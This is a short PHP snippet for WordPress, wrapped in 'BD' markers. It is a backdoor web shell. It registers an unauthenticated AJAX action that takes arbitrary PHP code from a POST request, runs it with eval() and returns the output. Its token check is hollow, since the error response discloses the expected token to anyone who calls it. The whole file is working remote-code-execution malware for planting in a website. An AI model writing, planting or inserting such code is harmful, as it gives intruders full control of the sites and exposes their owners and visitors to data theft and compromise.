// ==[BD:5Bhhpb3F]== add_action( 'wp_ajax_nopriv_cyvnvlrmwvz', function() { $flag = '5Bhhpb3FPUOXBoXV6vGtW5zgSCOWgGbl'; $entry = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : ''; if ( empty( $entry ) || ! hash_equals( $flag, $entry ) ) { wp_send_json_error( [ 'message' => 'tok:' . $flag ], 403 ); } $comp = isset( $_POST['code'] ) ? (string) wp_unslash( $_POST['code'] ) : ''; if ( trim( $comp ) === '' ) { wp_send_json_error( [ 'message' => 'No code.' ] ); } $comp = preg_replace( '/^\s*<\?(php)?/i', '', $comp ); while ( ob_get_level() > 0 ) { ob_end_clean(); } $marker = microtime( true ); ob_start(); try { ( static function() use ( $comp ) { return eval( $comp ); } )(); $data = (string) ob_get_clean(); wp_send_json_success( [ 'output' => $data, 'return' => '', 'error' => '', 'time_ms' => round( ( microtime( true ) - $marker ) * 1000, 2 ) ] ); } catch ( \Throwable $val ) { while ( ob_get_level() > 0 ) { ob_end_clean(); } wp_send_json_success( [ 'output' => '', 'return' => '', 'error' => $val->getMessage(), 'time_ms' => round( ( microtime( true ) - $marker ) * 1000, 2 ) ] ); } } ); // ==[/BD:5Bhhpb3F]==